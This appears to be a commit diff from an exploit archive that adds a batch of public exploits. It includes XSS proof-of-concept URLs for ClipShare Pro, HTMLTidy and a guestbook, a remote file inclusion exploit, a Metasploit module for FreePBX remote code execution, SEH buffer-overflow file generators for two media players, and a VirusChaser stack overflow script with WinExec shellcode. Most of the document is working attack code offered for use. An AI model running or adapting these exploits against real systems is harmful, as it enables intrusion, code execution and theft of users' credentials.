ClipShare Pro 4.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/[script_dir]/fullscreen.php?title=%3C/title%3E%3Cscript%3Ealert(1);%3C/script%3E

11
platforms/php/webapps/32527.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31908/info
Adam Wright HTMLTidy is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
HTMLTidy 0.5 is vulnerable; other versions may also be affected. Products that include HTMLTidy as a component will also be vulnerable.
NOTE: This record was previously titled 'Kayako eSupport html-tidy-logic.php Cross Site Scripting Vulnerability'. It has been updated to properly describe the vulnerability as an HTMLTidy issue.
http://www.example.com/[script_dir]/includes/htmlArea/plugins/HtmlTidy/html-tidy-logic.php?jsMakeSrc=return%20ns;%20}%20alert(2008);%20function%20whynot(){%20alert(2);

7
platforms/php/webapps/32528.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/31911/info
iPei Guestbook is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/index.php?pg=c0d3_xss

78
platforms/php/webapps/9623.txt
View file

@ -1,39 +1,39 @@
======================================================
Advanced comment system1.0 Remote File Inclusion Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Advanced_comment_system_1-0
<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
>>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
/advanced_comment_system/admin.php?ACS_path=[shell.txt?]
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
# milw0rm.com [2009-09-10]
======================================================
Advanced comment system1.0 Remote File Inclusion Vulnerability
<<!>> Found by : kurdish hackers team
<<!>> C0ntact : pshela [at] YaHoo .com
<<!>> Groups : Kurd-Team
<<!>> site : www.kurdteam.org
=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================
<<->> script :: Advanced_comment_system_1-0
<<->> download script :: http://www.plohni.com/wb/content/php/download/Advanced_comment_system_1-0.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================
<<->> Exploit ::
>>> www.site/path /advanced_comment_system/index.php?ACS_path=[shell.txt?]
/advanced_comment_system/admin.php?ACS_path=[shell.txt?]
=======================================================
=======================================================
<<->> All freinds , Zryan_kurd , RootSyS , Bravy_Boy all member kurdish hackers team
# milw0rm.com [2009-09-10]

103
platforms/unix/remote/32512.rb Executable file
View file

@ -0,0 +1,103 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "FreePBX config.php Remote Code Execution",
'Description' => %q{
This module exploits a vulnerability found in FreePBX version 2.9, 2.10, and 2.11.
It's possible to inject arbitrary PHP functions and commands in the "/admin/config.php"
parameters "function" and "args".
},
'License' => MSF_LICENSE,
'Author' =>
[
'i-Hmx', # Vulnerability discovery
'0x00string', # PoC
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'References' =>
[
['CVE', '2014-1903'],
['OSVDB', '103240'],
['EDB', '32214'],
['URL', 'http://issues.freepbx.org/browse/FREEPBX-7123']
],
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' =>
[
['FreePBX', {}]
],
'Privileged' => false,
'DisclosureDate' => "Mar 21 2014",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the FreePBX installation', '/'])
], self.class)
register_advanced_options(
[
OptString.new('PHPFUNC', [true, 'The PHP execution function to use', 'passthru'])
], self.class)
end
def check
vprint_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "CHANGES")
})
if res and res.code == 200 and res.body =~ /^(.*)$/
version = $1
else
return Exploit::CheckCode::Unknown
end
vprint_status("#{peer} - Version #{version} detected")
if version =~ /2\.(9|10|11)\.0/
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Safe
end
end
def exploit
rand_data = rand_text_alpha_lower(rand(10) + 5)
print_status("#{peer} - Sending payload")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "admin", "config.php"),
'vars_get' => {
"display" => rand_data,
"handler" => "api",
"function" => datastore['PHPFUNC'],
"args" => payload.encoded
}
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
print_error("#{peer} - Unexpected response, exploit probably failed!")
end
end
end

56
platforms/windows/dos/32513.py Executable file
View file

@ -0,0 +1,56 @@
?#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft HUPlayer 1.0.4.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/huplayer.aspx #
# Version: 1.0.4.8 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#
# (59c.5c4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000003 ebx=0141897a ecx=44444444 edx=01e28c98 esi=01e28c99 edi=01e28367
# eip=0044754f esp=01e27b3c ebp=0000079d iopl=0 nv up ei pl nz na po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
# *** ERROR: Module load completed but symbols could not be loaded for mpc-hc.exe
# mpc_hc+0x4754f:
# 0044754f 3b69f4 cmp ebp,dword ptr [ecx-0Ch] ds:0023:44444438=????????
# 0:005> g
# (59c.5c4): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=01e2776c ebp=01e2778c iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 01e27780: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 01e28b68: 43434343
# Invalid exception stack at 42424242
#!/usr/bin/python
junk1 = "\x80" * 50;
offset = "\x41" * 1595;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")

57
platforms/windows/dos/32514.py Executable file
View file

@ -0,0 +1,57 @@
?#-----------------------------------------------------------------------------#
# Exploit Title: Haihaisoft Universal Player 1.5.8 - Buffer Overflow (SEH) #
# Date: Mar 25 2014 #
# Exploit Author: Gabor Seljan #
# Software Link: http://www.haihaisoft.com/hup.aspx #
# Version: 1.5.8.0 #
# Tested on: Windows XP SP3 #
#-----------------------------------------------------------------------------#
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=44444444 ecx=0000000f edx=00000000 esi=04bae7d0 edi=44444448
# eip=0069537f esp=04cb7b18 ebp=04cb7b58 iopl=0 nv up ei pl nz na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
# *** ERROR: Module load completed but symbols could not be loaded for mplayerc.exe
# mplayerc+0x29537f:
# 0069537f f3ab rep stos dword ptr es:[edi]
# 0:005> g
# (6ec.57c): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
# eip=43434343 esp=04cb7748 ebp=04cb7768 iopl=0 nv up ei pl zr na pe nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
# 43434343 ?? ???
# 0:005> !exchain
# 04cb775c: ntdll!RtlConvertUlongToLargeInteger+7e (7c9032bc)
# 04cb7b4c: mplayerc+2e2e78 (006e2e78)
# 04cb8b80: 43434343
# Invalid exception stack at 42424242
#!/usr/bin/python
junk1 = "\x80" * 50;
offset = "\x41" * 1591;
nSEH = "\x42" * 4;
SEH = "\x43" * 4;
junk2 = "\x44" * 5000;
evil = "http://{junk1}{offset}{nSEH}{SEH}{junk2}".format(**locals())
for e in ['m3u', 'pls', 'asx']:
if e is 'm3u':
poc = evil
elif e is 'pls':
poc = "[playlist]\nFile1={}".format(evil)
else:
poc = "<asx version=\"3.0\"><entry><ref href=\"{}\"/></entry></asx>".format(evil)
try:
print("[*] Creating poc.%s file..." % e)
f = open('poc.%s' % e, 'w')
f.write(poc)
f.close()
print("[*] %s file successfully created!" % f.name)
except:
print("[!] Error while creating exploit file!")

37
platforms/windows/dos/32522.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: VirusChaser 8.0 - Stack Buffer Overflow
# Date: 2014/03/26
# Exploit Author: wh1ant
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Version: 8.0
# Tested on: Windows 7 ultimate K
#
# You must have administrator permission to run
from struct import pack
import os
shellcode = "\x66\x83\xc4\x10" # add esp, 0x10
shellcode += "\xb8\x50\x70\x50\x50" # mov eax, 0x50507050
shellcode += "\xb9\x4e\x7d\x04\x27" # mov ecx, 0x27047d4e
shellcode += "\x03\xc1" # add eax, ecx ; WinExec() address
shellcode += "\x68\x63\x6d\x64\x01" # push 0x01646D63
shellcode += "\x66\xb9\x50\x50" # add cx, 0x5050
shellcode += "\x66\x81\xc1\xb0\xaf" # add cx, 0xafb0
shellcode += "\x88\x4c\x24\x03" # mov [esp+3], cl
shellcode += "\x8b\xd4" # mov edx, esp
shellcode += "\x66\x51" # push cx
shellcode += "\x41" # inc cx
shellcode += "\x66\x51" # push cx
shellcode += "\x52" # push edx
shellcode += "\x50" # push eax
shellcode += "\x50" # push eax
shellcode += "\xc3\x90" # retn ; WinExec()
# BOF retn: 0x0040753d
pay = shellcode
pay = pay.rjust(520, "\x90")
pay += "\x9c\xdb\x12"
os.system("C:\\\"Program Files\\VirusChaser\\scanner.exe\" \"" + pay + "\"")

12
platforms/windows/remote/32517.html Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
<html>
<body>
<script>alert('backdoored');</script>
</body>
</html>

11
platforms/windows/remote/32518.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/31855/info
Multiple vendors' web browsers are prone to a cross-site scripting weakness that arises because the software fails to handle specially crafted files served using the FTP protocol.
Successfully exploiting this issue may allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of an FTP session. This may allow the attacker to perform malicious actions in a user's browser or redirect the user to a malicious site; other attacks are also possible.
<html>
<body>
<script>alert('backdoored');</script>
</body>
</html>